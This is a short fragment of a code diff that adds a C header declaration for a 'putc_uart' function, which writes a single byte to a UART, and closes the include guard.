+uint32_t putc_uart(uint64_t dmap, uint8_t tx_byte);
+
+#endif